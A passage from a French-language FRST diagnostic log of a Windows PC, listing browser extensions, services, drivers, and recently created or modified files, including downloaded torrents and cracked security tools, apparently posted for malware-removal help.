CHR Extension: (Google Docs hors connexion) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-06-26]
CHR Extension: (Qwant) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnlkiofnhhoahaiimdicppgemmmomijo [2020-12-19]
CHR Extension: (Guns Wallpapers HD New Tab by freeaddon.com) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\iaijjmobdokjfemcipmdpkkedeoficgg [2021-05-13]
CHR Extension: (Microsoft News New Tab) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\lklfbkdigihjaaeamncibechhgalldgl [2021-07-18]
CHR Extension: (PowerPoint Online) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2020-12-16]
CHR Extension: (Infinite New Tab - the best Chrome startpage) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\meffljleomgifbbcffejnmhjagncfpbd [2021-05-13]
CHR Extension: (Web Safety) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhcmdonhekjhfbjmeacdjbhlfgpjabp [2021-07-18]
CHR Extension: (Norton Safe) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpnlkmlkncncpgnnkmkgoobfpnjmblnk [2021-06-16]
CHR Extension: (Office) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndjpnladcallmjemlbaebfadecfhkepb [2021-04-19]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-06-01]
CHR Extension: (Chrome Media Router) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-06-04]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]
==================== Services (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-26] (Adobe Inc. -> Adobe Inc.)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [Fichier non signé]
R2 CyberLink PowerDVD 10 MS Service; C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSServer.exe [312616 2011-04-13] (CyberLink -> CyberLink)
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.21.5.44\NortonSecurity.exe [343336 2021-05-31] (NortonLifeLock Inc. -> Broadcom)
R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.21.5.44\nsWscSvc.exe [1055048 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [3004048 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103384 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 CyberLink PowerDVD 10 MS Monitor Service; "C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSMonitorService.exe" [X]
S2 IAStorDataMgrSvc; "C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe" [X]
S2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [X]
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugin"
S2 VPNUnlimitedService; "C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" [X]
===================== Pilotes (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R1 amsdk; C:\WINDOWS\system32\drivers\amsdk.sys [232792 2021-04-09] (Zemana D.O.O. Sarajevo -> Copyright 2018.)
S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
R1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.20.5.39\Definitions\BASHDefs\20210714.013\BHDrvx64.sys [1995864 2021-03-16] (Symantec Corporation -> Broadcom)
R1 ccSet_NGC; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\ccSetx64.sys [192248 2021-05-31] (Symantec Corporation -> Symantec Corporation)
R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink -> CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [516168 2021-02-02] (Symantec Corporation -> Broadcom)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [153672 2021-02-10] (Symantec Corporation -> Broadcom)
S3 FXVAD; C:\WINDOWS\system32\drivers\fxvad.sys [326656 2021-06-29] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.20.5.39\Definitions\IPSDefs\20210716.061\IDSvia64.sys [1488976 2021-04-06] (Symantec Corporation -> Broadcom)
R3 int0800; C:\WINDOWS\System32\drivers\flashud.sys [62984 2019-08-21] (Intel Corporation -> Intel Corporation)
S3 nsvst_NGC; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\nsvst.sys [54848 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
S3 RtlWlanu; C:\WINDOWS\System32\drivers\rtwlanu.sys [4776176 2017-12-20] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation)
R1 SRTSP; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\SRTSP64.SYS [890464 2021-05-31] (Symantec Corporation -> Broadcom)
R1 SRTSPX; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\SRTSPX64.SYS [50272 2021-05-31] (Symantec Corporation -> Broadcom)
R0 SymEFASI; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\SYMEFASI64.SYS [2062424 2021-05-31] (Symantec Corporation -> Broadcom)
S0 SymELAM; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\SymELAM.sys [25080 2021-05-31] (Microsoft Windows Early Launch Anti-malware Publisher -> Broadcom Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [99912 2020-12-15] (Symantec Corporation -> Symantec Corporation)
R3 SymEvnt; C:\Program Files\Norton Security\NortonData\22.20.5.39\SymPlatform\SymEvnt.sys [712424 2020-07-21] (Symantec Corporation -> Symantec Corporation)
R1 SymIRON; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\Ironx64.SYS [316488 2021-05-31] (Symantec Corporation -> Symantec Corporation)
R1 SymNetS; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\symnets.sys [575328 2021-05-31] (Symantec Corporation -> Symantec Corporation)
R3 tap0901; C:\WINDOWS\System32\drivers\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 tapprotonvpn; C:\WINDOWS\System32\drivers\tapprotonvpn.sys [49008 2020-04-06] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46688 2019-12-07] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [350136 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [54200 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S3 WNDA3100v3; C:\WINDOWS\system32\DRIVERS\WNDA3100v3.sys [2259016 2018-03-05] (NETGEAR TAIWAN CO., LTD -> MediaTek Inc.)
S3 wpCtrlDrv_NGC; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\wpCtrlDrv.sys [1013792 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois (créés) (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2021-07-18 14:16 - 2021-07-18 14:17 - 000000000 ____D C:\FRST
2021-07-18 14:06 - 2021-07-18 14:06 - 000001397 _____ C:\DelFix.txt
2021-07-18 13:20 - 2021-07-18 13:20 - 000000000 ____D C:\WINDOWS\system32\Tasks\Remediation
2021-07-18 12:07 - 2021-07-18 12:07 - 000001263 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pixillion - Convertisseur d'images.lnk
2021-07-18 12:07 - 2021-07-18 12:07 - 000000000 ____D C:\Users\eddy99\Suite NCH Software
2021-07-18 11:37 - 2021-07-18 11:37 - 001066873 _____ C:\Users\eddy99\Downloads\carte-reseau-infrabel-FR.pdf
2021-07-18 11:14 - 2021-07-18 11:14 - 000000000 ____D C:\WINDOWS\Panther
2021-07-17 18:12 - 2021-07-17 18:12 - 014767048 _____ (Intel Corporation) C:\Users\eddy99\Downloads\SetupRST.exe
2021-07-17 18:12 - 2021-07-17 18:12 - 000000000 ____D C:\Users\eddy99\Intel
2021-07-17 15:17 - 2021-07-17 15:17 - 000255928 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\27517114.sys
2021-07-17 08:35 - 2021-07-17 08:37 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation
2021-07-17 08:35 - 2021-07-17 08:35 - 000000000 ____D C:\Users\eddy99\AppData\Local\SaRALogs
2021-07-17 08:33 - 2021-07-17 11:59 - 000000000 ____D C:\Users\eddy99\AppData\Local\Deployment
2021-07-17 08:33 - 2021-07-17 08:33 - 000000000 ____D C:\Users\eddy99\AppData\Local\Apps\2.0
2021-07-16 20:39 - 2021-07-18 11:06 - 000000000 ____D C:\Users\eddy99\AppData\Local\vback
2021-07-16 20:39 - 2021-07-16 20:39 - 000002396 _____ C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxthon.lnk
2021-07-16 20:39 - 2021-07-16 20:39 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\VBox
2021-07-16 20:38 - 2021-07-16 20:39 - 000000000 ____D C:\Users\eddy99\AppData\Local\Maxthon
2021-07-16 20:00 - 2021-07-17 08:19 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-07-16 17:34 - 2021-07-16 17:34 - 064650240 _____ (The Chromium Authors) C:\Users\eddy99\Downloads\chromium_93-0-4578_en_432989_32.exe
2021-07-16 13:44 - 2021-07-16 13:44 - 000386829 _____ C:\Users\eddy99\Downloads\CCF_000026.pdf
2021-07-16 13:44 - 2021-07-16 13:44 - 000383333 _____ C:\Users\eddy99\Downloads\CCF_000025.pdf
2021-07-16 08:20 - 2021-07-18 14:14 - 000000000 ____D C:\Users\eddy99\AppData\LocalLow\uTorrent
2021-07-15 12:55 - 2021-07-15 12:55 - 000011357 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-07-15 12:55 - 2021-07-15 12:55 - 000007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MsraLegacy.tlb
2021-07-15 12:55 - 2021-07-15 12:55 - 000007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsraLegacy.tlb
2021-07-15 12:55 - 2021-07-15 12:55 - 000006656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rendezvousSession.tlb
2021-07-15 12:55 - 2021-07-15 12:55 - 000006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\rendezvousSession.tlb
2021-07-15 12:54 - 2021-07-15 12:54 - 001823280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2021-07-14 23:23 - 2021-07-15 14:28 - 000000000 ____D C:\Program Files (x86)\BraveSoftware
2021-07-14 23:23 - 2021-07-15 14:06 - 000000000 ____D C:\Users\eddy99\AppData\Local\BraveSoftware
2021-07-11 22:14 - 2021-07-11 22:14 - 000000000 ____D C:\Users\eddy99\Downloads\Hitman-Pro-3823318-Crack---Product-Key-Full-Download-2021
2021-07-11 22:13 - 2021-07-11 22:13 - 001570966 _____ C:\Users\eddy99\Downloads\60eb50_Hitman-Pro-3823.zip
2021-07-11 22:01 - 2021-07-11 22:28 - 000000000 ____D C:\ProgramData\HitmanPro.Alert
2021-07-11 22:01 - 2021-07-11 22:28 - 000000000 ____D C:\ProgramData\HitmanPro
2021-07-06 12:17 - 2021-07-06 12:17 - 000218027 _____ C:\Users\eddy99\Downloads\{70E67A7A-0000-C449-89A8-F8EA89B36791}.pdf
2021-07-05 13:22 - 2021-07-05 13:22 - 000255928 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\11350E4B.sys
2021-07-05 10:00 - 2021-07-05 10:00 - 000000000 ____D C:\ProgramData\FxSound LLC
2021-07-04 14:59 - 2021-07-04 14:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2021-07-04 14:58 - 2021-07-04 14:59 - 000000000 ____D C:\Program Files (x86)\qBittorrent
2021-07-04 14:55 - 2021-07-04 14:55 - 000000000 ____H C:\ProgramData\DP45977C.lfl
2021-07-04 14:55 - 2021-07-04 14:55 - 000000000 ____D C:\WINDOWS\system32\DAX3
2021-07-04 14:55 - 2021-07-04 14:55 - 000000000 ____D C:\WINDOWS\system32\DAX2
2021-07-04 14:55 - 2021-07-04 14:55 - 000000000 ____D C:\ProgramData\Audyssey Labs
2021-07-02 23:11 - 2021-07-02 23:11 - 000000000 ____D C:\Program Files\FxSound LLC
2021-06-30 20:14 - 2021-06-30 20:16 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TP-Link
2021-06-30 20:14 - 2021-06-30 20:16 - 000000000 ____D C:\Program Files (x86)\TP-Link
2021-06-30 20:13 - 2017-12-20 00:53 - 004776176 _____ (Realtek Semiconductor Corporation ) C:\WINDOWS\system32\rtwlanu.sys
2021-06-30 20:13 - 2017-12-20 00:53 - 004776176 _____ (Realtek Semiconductor Corporation ) C:\WINDOWS\system32\Drivers\rtwlanu.sys
2021-06-30 20:13 - 2017-12-20 00:53 - 000018545 _____ C:\WINDOWS\system32\netrtwlanu.cat
2021-06-30 15:53 - 2021-07-18 14:14 - 000000000 ____D C:\Program Files\CCleaner
2021-06-30 15:53 - 2021-07-01 18:53 - 000004210 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2021-06-30 15:53 - 2021-06-30 15:53 - 000002874 _____ C:\WINDOWS\system32\Tasks\CCleanerSkipUAC
2021-06-30 15:53 - 2021-06-30 15:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2021-06-29 07:16 - 2021-06-29 07:16 - 000326656 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\fxvad.sys
2021-06-26 20:37 - 2021-06-26 20:37 - 000016402 _____ C:\Users\eddy99\Downloads\CCleaner Pro Portable 5.82.8950 (Windows).torrent
2021-06-25 23:28 - 2021-06-25 23:28 - 000000000 ____D C:\Users\eddy99\Downloads\TL-WN823N(EUUS)_V3_181024_Win
2021-06-25 23:24 - 2018-11-07 04:51 - 000000000 ____D C:\Users\eddy99\Downloads\plugins
2021-06-25 23:24 - 2018-03-20 10:09 - 000001306 ____N C:\Users\eddy99\Downloads\readme.txt
2021-06-25 23:24 - 2018-01-30 09:46 - 043482128 ____R C:\Users\eddy99\Downloads\Setup.exe
2021-06-25 23:23 - 2021-06-25 23:24 - 044139521 _____ C:\Users\eddy99\Downloads\TL-WN823N(EUUS)_V3_181024_Win.zip
2021-06-23 22:06 - 2021-06-23 22:06 - 001624440 _____ (Tous Les Drivers) C:\Users\eddy99\Downloads\Mes_Drivers_3.0.4 (1).exe
2021-06-23 14:32 - 2021-06-23 14:32 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\de.devolo.dLAN.Cockpit
2021-06-22 14:34 - 2021-06-22 14:34 - 002371072 _____ C:\WINDOWS\system32\rdpnano.dll
2021-06-22 14:34 - 2021-06-22 14:34 - 001393504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2021-06-22 14:34 - 2021-06-22 14:34 - 001314128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2021-06-22 14:34 - 2021-06-22 14:34 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2021-06-22 14:34 - 2021-06-22 14:34 - 000452608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2021-06-22 14:34 - 2021-06-22 14:34 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-06-22 14:34 - 2021-06-22 14:34 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-06-22 14:34 - 2021-06-22 14:34 - 000060928 _____ C:\WINDOWS\system32\runexehelper.exe
2021-06-22 14:33 - 2021-06-22 14:33 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-06-22 14:33 - 2021-06-22 14:33 - 000097792 _____ C:\WINDOWS\system32\Drivers\cimfs.sys
2021-06-22 13:55 - 2021-07-05 22:05 - 000000000 ____D C:\Program Files (x86)\SlimCleaner
2021-06-22 12:38 - 2021-06-22 12:39 - 035958288 _____ (Piriform Software Ltd) C:\Users\eddy99\Downloads\ccsetup582.exe
2021-06-21 23:11 - 2021-07-18 14:13 - 000000000 ____D C:\WINDOWS\system32\Tasks\Norton Security with Backup
2021-06-21 23:10 - 2021-06-21 23:10 - 000003376 _____ C:\WINDOWS\system32\Tasks\Norton WSC Integration
2021-06-21 23:10 - 2021-06-21 23:10 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security
2021-06-21 19:53 - 2021-06-21 19:53 - 000006965 _____ C:\Users\eddy99\Downloads\CCleaner Bundle Professional Plus v5.81.torrent
2021-06-20 17:57 - 2021-06-20 17:59 - 000000000 ____D C:\ProgramData\PC Cleaner
2021-06-20 16:07 - 2021-06-20 16:07 - 000000644 _____ C:\ProgramData\SMRResults540.dat
2021-06-20 15:56 - 2021-06-20 16:06 - 000000000 ____D C:\Users\eddy99\AppData\Local\NPE
2021-06-20 14:27 - 2021-06-20 14:27 - 000000000 ____D C:\Program Files (x86)\WinRAR
2021-06-20 12:28 - 2021-06-20 12:28 - 000002623 _____ C:\Users\eddy99\Downloads\Malwarebytes.Anti-Malware.Premium.4.2.0.82.incl.License.[CrackingPatching].torrent
2021-06-20 12:26 - 2021-06-20 12:26 - 000018591 _____ C:\Users\eddy99\Downloads\CCleaner.v5.74.8198.éditions.Pro.&.Business.multi.+.licence.[WIN].torrent
==================== Un mois (modifiés) ==================
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2021-07-18 14:20 - 2020-12-16 22:34 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\uTorrent
2021-07-18 14:19 - 2021-04-09 21:35 - 000080096 _____ C:\WINDOWS\ZAM.krnl.trace
2021-07-18 14:15 - 2020-12-16 14:59 - 001772726 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-07-18 14:15 - 2019-12-07 16:49 - 000791762 _____ C:\WINDOWS\system32\perfh00C.dat
2021-07-18 14:15 - 2019-12-07 16:49 - 000149928 _____ C:\WINDOWS\system32\perfc00C.dat
2021-07-18 14:15 - 2019-12-07 11:13 - 000000000 ____D C:\WINDOWS\INF
2021-07-18 14:14 - 2020-12-16 15:06 - 000000000 ___RD C:\Users\eddy99\OneDrive
2021-07-18 14:10 - 2020-12-15 02:32 - 000000000 ____D C:\Program Files (x86)\Google
2021-07-18 14:10 - 2013-03-11 21:03 - 000000000 ____D C:\ProgramData\NVIDIA
2021-07-18 14:08 - 2020-12-16 14:36 - 000008192 ___SH C:\DumpStack.log.tmp
2021-07-18 14:08 - 2020-11-19 01:29 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-07-18 14:08 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-07-18 14:07 - 2020-12-15 02:45 - 000000000 ____D C:\Users\eddy99\AppData\Local\ClassicShell
2021-07-18 14:07 - 2019-12-07 11:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-07-18 13:59 - 2020-12-15 03:16 - 000000000 ____D C:\Users\eddy99\AppData\LocalLow\Mozilla
2021-07-18 13:55 - 2020-12-16 21:06 - 000000000 ____D C:\Users\eddy99\AppData\Local\Epic Privacy Browser
2021-07-18 13:41 - 2020-12-15 14:10 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\ZHP
2021-07-18 13:26 - 2021-06-01 08:23 - 003258008 _____ (Nicolas Coolman) C:\Users\eddy99\ZHPCleaner.exe
2021-07-18 13:26 - 2020-12-16 14:47 - 000000000 ____D C:\Users\eddy99
2021-07-18 13:23 - 2020-11-19 00:28 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-07-18 12:08 - 2020-12-20 23:25 - 000000000 ____D C:\Users\eddy99\OneDrive\Documents\MesPagesWeb
2021-07-18 12:07 - 2021-06-13 16:03 - 000000000 ____D C:\WINDOWS\system32\Tasks\NCH Software
2021-07-18 12:07 - 2021-06-13 16:03 - 000000000 ____D C:\ProgramData\NCH Software
2021-07-18 12:07 - 2021-06-13 16:03 - 000000000 ____D C:\Program Files (x86)\NCH Software
2021-07-18 12:06 - 2021-01-15 20:31 - 000000000 ____D C:\Users\eddy99\AppData\Local\D3DSCache
2021-07-18 11:29 - 2020-12-15 02:27 - 000000000 ____D C:\Users\eddy99\AppData\Local\CrashDumps
2021-07-18 09:02 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-07-18 00:20 - 2021-04-13 13:19 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\qBittorrent
2021-07-17 18:43 - 2020-11-19 01:31 - 000002446 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-07-17 18:43 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-07-17 15:31 - 2021-04-09 21:35 - 000000000 ____D C:\Users\eddy99\AppData\Local\AMSDK
2021-07-17 15:30 - 2020-12-15 02:40 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2021-07-17 15:17 - 2021-03-07 15:11 - 000192952 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2021-07-16 20:35 - 2020-12-15 03:16 - 000000000 ____D C:\ProgramData\Mozilla
2021-07-16 20:00 - 2020-12-15 03:16 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-07-16 13:26 - 2020-12-16 14:54 - 000003588 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2021-07-16 13:26 - 2020-12-16 14:54 - 000003464 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2021-07-15 19:45 - 2020-12-16 15:06 - 000003366 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3835626661-1005971116-1630247016-1002
2021-07-15 19:45 - 2020-12-16 14:47 - 000002428 _____ C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-07-15 13:37 - 2020-11-19 00:28 - 000279848 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-07-15 13:35 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-07-15 13:35 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-07-15 13:35 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-07-15 13:35 - 2019-12-07 11:14 - 000000000 ____D C:\Program Files\Common Files\System
2021-07-15 12:59 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-07-15 12:37 - 2020-12-16 15:10 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-07-15 12:33 - 2012-11-05 19:14 - 133422552 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-07-15 11:58 - 2021-03-16 20:46 - 000000000 ____D C:\ProgramData\FxSound
2021-07-15 11:57 - 2021-03-16 20:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\FxSound
2021-07-15 11:03 - 2021-03-16 20:39 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\FxSound
2021-07-15 09:59 - 2021-02-03 23:57 - 000000000 ____D C:\Users\eddy99\AppData\Local\ElevatedDiagnostics
2021-07-15 09:55 - 2021-01-13 19:21 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2021-07-15 09:55 - 2019-12-07 11:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-07-14 18:06 - 2020-12-15 03:16 - 000001217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2021-07-13 23:21 - 2021-02-10 19:58 - 000002140 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2021-07-13 17:38 - 2020-12-15 02:09 - 000000000 ____D C:\Users\eddy99\AppData\Local\Packages
2021-07-12 00:50 - 2019-12-07 11:10 - 000383488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000215552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2021-07-12 00:50 - 2019-12-07 11:10 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2021-07-12 00:50 - 2019-12-07 11:10 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2021-07-12 00:50 - 2019-12-07 11:10 - 000005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000494592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2021-07-12 00:50 - 2019-12-07 11:09 - 000010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2021-07-12 00:50 - 2019-12-07 11:09 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2021-07-10 19:28 - 2019-12-07 16:51 - 000000000 ____D C:\WINDOWS\system32\OpenSSH
2021-07-10 19:28 - 2019-12-07 16:49 - 000000000 ____D C:\WINDOWS\SysWOW64\fr
2021-07-10 19:28 - 2019-12-07 16:49 - 000000000 ____D C:\WINDOWS\system32\fr
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
